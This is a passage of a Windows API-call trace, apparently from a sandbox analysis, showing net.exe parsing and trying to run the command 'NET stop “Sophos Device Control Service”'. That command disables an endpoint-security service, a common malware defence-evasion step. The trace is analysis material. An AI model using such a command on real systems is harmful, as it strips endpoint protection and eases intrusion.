| out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.516] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0121.516] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.516] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0121.516] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.516] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0121.516] _wcsicmp (_String1="REDIRECTOR", _String2="“Sophos") returned -8106 [0121.516] _wcsicmp (_String1="REDIRECTOR", _String2="Device") returned 14 [0121.516] _wcsicmp (_String1="REDIRECTOR", _String2="Control") returned 15 [0121.516] _wcsicmp (_String1="REDIRECTOR", _String2="Service”") returned -1 [0121.516] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0121.516] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.516] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0121.516] _wcsicmp (_String1="REDIR", _String2="“Sophos") returned -8106 [0121.516] _wcsicmp (_String1="REDIR", _String2="Device") returned 14 [0121.516] _wcsicmp (_String1="REDIR", _String2="Control") returned 15 [0121.516] _wcsicmp (_String1="REDIR", _String2="Service”") returned -1 [0121.516] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0121.516] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.516] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0121.516] _wcsicmp (_String1="RDR", _String2="“Sophos") returned -8106 [0121.516] _wcsicmp (_String1="RDR", _String2="Device") returned 14 [0121.516] _wcsicmp (_String1="RDR", _String2="Control") returned 15 [0121.516] _wcsicmp (_String1="RDR", _String2="Service”") returned -1 [0121.516] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0121.516] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.516] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0121.516] _wcsicmp (_String1="WORK", _String2="“Sophos") returned -8101 [0121.516] _wcsicmp (_String1="WORK", _String2="Device") returned 19 [0121.517] _wcsicmp (_String1="WORK", _String2="Control") returned 20 [0121.517] _wcsicmp (_String1="WORK", _String2="Service”") returned 4 [0121.517] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0121.517] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.517] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0121.517] _wcsicmp (_String1="WKSTA", _String2="“Sophos") returned -8101 [0121.517] _wcsicmp (_String1="WKSTA", _String2="Device") returned 19 [0121.517] _wcsicmp (_String1="WKSTA", _String2="Control") returned 20 [0121.517] _wcsicmp (_String1="WKSTA", _String2="Service”") returned 4 [0121.517] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0121.517] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.517] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0121.517] _wcsicmp (_String1="PRDR", _String2="“Sophos") returned -8108 [0121.517] _wcsicmp (_String1="PRDR", _String2="Device") returned 12 [0121.517] _wcsicmp (_String1="PRDR", _String2="Control") returned 13 [0121.517] _wcsicmp (_String1="PRDR", _String2="Service”") returned -3 [0121.517] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0121.517] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.517] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0121.517] _wcsicmp (_String1="DEVRDR", _String2="“Sophos") returned -8120 [0121.517] _wcsicmp (_String1="DEVRDR", _String2="Device") returned 9 [0121.517] _wcsicmp (_String1="DEVRDR", _String2="Control") returned 1 [0121.517] _wcsicmp (_String1="DEVRDR", _String2="Service”") returned -15 [0121.517] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.517] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0121.517] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.517] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0121.517] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.517] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0121.517] _wcsicmp (_String1="SVR", _String2="“Sophos") returned -8105 [0121.517] _wcsicmp (_String1="SVR", _String2="Device") returned 15 [0121.517] _wcsicmp (_String1="SVR", _String2="Control") returned 16 [0121.517] _wcsicmp (_String1="SVR", _String2="Service”") returned 17 [0121.517] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0121.517] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.518] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0121.518] _wcsicmp (_String1="SRV", _String2="“Sophos") returned -8105 [0121.518] _wcsicmp (_String1="SRV", _String2="Device") returned 15 [0121.518] _wcsicmp (_String1="SRV", _String2="Control") returned 16 [0121.518] _wcsicmp (_String1="SRV", _String2="Service”") returned 13 [0121.518] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0xcf800, nSize=0x0, Arguments=0xcf7fc | out: lpBuffer="㸀Qꔺ盹") returned 0x1c [0121.518] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0121.518] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0121.518] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0121.518] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0121.518] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.518] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0121.518] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0121.518] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.518] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0121.518] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.518] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0121.518] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0121.518] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0121.644] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0121.645] GetFileType (hFile=0x0) returned 0x0 [0121.645] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x5140d0 [0121.645] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x5140d0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0121.645] WriteFile (in: hFile=0x0, lpBuffer=0x5140d0, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0xcf7e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf7e0, lpOverlapped=0x0) returned 0 [0121.645] LocalFree (hMem=0x5140d0) returned 0x0 [0121.645] GetFileType (hFile=0x0) returned 0x0 [0121.645] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x513c60 [0121.645] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x513c60, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nQ", lpUsedDefaultChar=0x0) returned 2 [0121.645] WriteFile (in: hFile=0x0, lpBuffer=0x513c60, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcf7e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf7e0, lpOverlapped=0x0) returned 0 [0121.645] LocalFree (hMem=0x513c60) returned 0x0 [0121.645] wcscpy_s (in: _Destination=0xcf898, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="“Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET stop “Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos ") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET stop “Sophos ", _SizeInWords=0x200, _Source="Device", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos Device") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET stop “Sophos Device", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos Device ") returned 0x0 [0121.645] wcsncat_s (in: _Destination="NET stop “Sophos Device ", _SizeInWords=0x200, _Source="Control", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos Device Control") returned 0x0 [0121.646] wcsncat_s (in: _Destination="NET stop “Sophos Device Control", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos Device Control ") returned 0x0 [0121.646] wcsncat_s (in: _Destination="NET stop “Sophos Device Control ", _SizeInWords=0x200, _Source="Service”", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos Device Control Service”") returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q댸9\x0cѰ9") returned 0xad [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | N", _MaxCount=0x28) returned 18 [0121.646] LocalFree (hMem=0x515738) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x2e [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DE", _MaxCount=0x28) returned 16 [0121.646] LocalFree (hMem=0x513e48) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x7d [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time", _MaxCount=0x28) returned 16 [0121.646] LocalFree (hMem=0x515738) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x26 [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x28) returned 16 [0121.646] LocalFree (hMem=0x513e48) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x28) returned 16 [0121.646] LocalFree (hMem=0x513e48) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x1b [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x28) returned 13 [0121.646] LocalFree (hMem=0x513e48) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0xbe [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]]", _MaxCount=0x28) returned 12 [0121.646] LocalFree (hMem=0x515738) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x33 [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET comman", _MaxCount=0x28) returned 11 [0121.646] LocalFree (hMem=0x513e48) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x19 [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x28) returned 11 [0121.646] LocalFree (hMem=0x513e48) returned 0x0 [0121.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0xc1 [0121.646] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"te", _MaxCount=0x28) returned 7 [0121.646] LocalFree (hMem=0x515738) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x16 [0121.647] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x28) returned 3 [0121.647] LocalFree (hMem=0x513e48) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x33 [0121.647] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] ", _MaxCount=0x28) returned 15 [0121.647] LocalFree (hMem=0x513e48) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x234 [0121.647] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET SHARE\r\nsharename\r\n sharenam", _MaxCount=0x28) returned 12 [0121.647] LocalFree (hMem=0x515738) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c圸Q\x0c") returned 0x13 [0121.647] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START BROWSER\r\n", _MaxCount=0x28) returned 14 [0121.647] LocalFree (hMem=0x513e48) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.647] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x28) returned 14 [0121.647] LocalFree (hMem=0x513e48) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.647] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START EVENTLOG\r\n", _MaxCount=0x28) returned 14 [0121.647] LocalFree (hMem=0x513e48) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.647] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START MESSENGER\r\n", _MaxCount=0x28) returned 14 [0121.647] LocalFree (hMem=0x513e48) returned 0x0 [0121.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START NET LOGON\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x16 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x11 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START RPCSS\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x14 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START SCHEDULE\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x12 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START SERVER\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0xf [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START UPS\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x17 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START WORKSTATION\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x18 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x2a [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n", _MaxCount=0x28) returned 14 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x28) returned 19 [0121.648] LocalFree (hMem=0x513e48) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c㹈Q\x0c") returned 0x58 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:d", _MaxCount=0x28) returned -1 [0121.648] LocalFree (hMem=0x515738) returned 0x0 [0121.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x184 [0121.648] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET USE\r\n[devicename | *] [\\\\computernam", _MaxCount=0x28) returned -2 [0121.648] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xc7 [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET USER\r\n[username [password | *] [opti", _MaxCount=0x28) returned -2 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x47 [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/A", _MaxCount=0x28) returned -3 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xc2 [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG ", _MaxCount=0x28) returned 19 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x319 [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="SERVICES\r\nNET START can be used to start", _MaxCount=0x28) returned -5 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x483 [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="SYNTAX\r\nThe following conventions are us", _MaxCount=0x28) returned -5 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xa86 [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="NAMES\r\nThe following types of names are ", _MaxCount=0x28) returned 4 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0x54 [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control Service”", _String2="\r\nFor more information on tools see the ", _MaxCount=0x28) returned 97 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="圸Q⡋盺\x0c圸Q\x0c") returned 0xad [0121.649] _wcsnicmp (_String1="NET stop “Sophos Device Control", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{mi", _MaxCount=0x1f) returned 18 [0121.649] LocalFree (hMem=0x515738) returned 0x0 [0121.650] FormatMessageW (in: dwFlags=0x1900, 